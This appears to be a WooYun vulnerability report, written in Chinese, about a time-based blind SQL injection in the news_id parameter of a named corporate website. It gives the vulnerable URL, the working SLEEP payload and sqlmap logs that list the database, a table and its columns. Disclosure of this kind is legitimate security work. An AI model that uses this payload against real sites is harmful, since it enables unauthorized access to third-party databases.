WooYun.org

1.注入点
"http://innofair.cofco.com/?a=newsdetails&news_id=114&m=News"
2.虽然是mysql 但是不能加--dbms mysql 不知道为啥
3.一系列的爆库爆内容吧，放几张截图

4.放点sqlmap的log
sqlmap identified the following injection points with a total of 554 HTTP(s) requests:
---
Place: GET
Parameter: news_id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: a=newsdetails&news_id=114) AND SLEEP(5) AND (9012=9012&m=News
---
web application technology: Apache 2.2.24
back-end DBMS: MySQL 5.0.11
current database: 'chinafood'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: news_id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: a=newsdetails&news_id=114) AND SLEEP(5) AND (9012=9012&m=News
---
web application technology: Apache 2.2.24
back-end DBMS: MySQL 5.0.11
Database: chinafood
[1 table]
+------------+
| BOOK_LOANS |
+------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: news_id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: a=newsdetails&news_id=114) AND SLEEP(5) AND (9012=9012&m=News
---
web application technology: Apache 2.2.24
back-end DBMS: MySQL 5.0.11
Database: chinafood
Table: BOOK_LOANS
[4 columns]
+-----------+---------+
| Column | Type |
+-----------+---------+
| chaveta | numeric |
| idcountry | numeric |
| maty_id | numeric |
| orderid | numeric |
+-----------+---------+
5.漏洞原来就有人提交过，只不过我再次验证仍然存在。从厂家安全的角度不应该是这样的。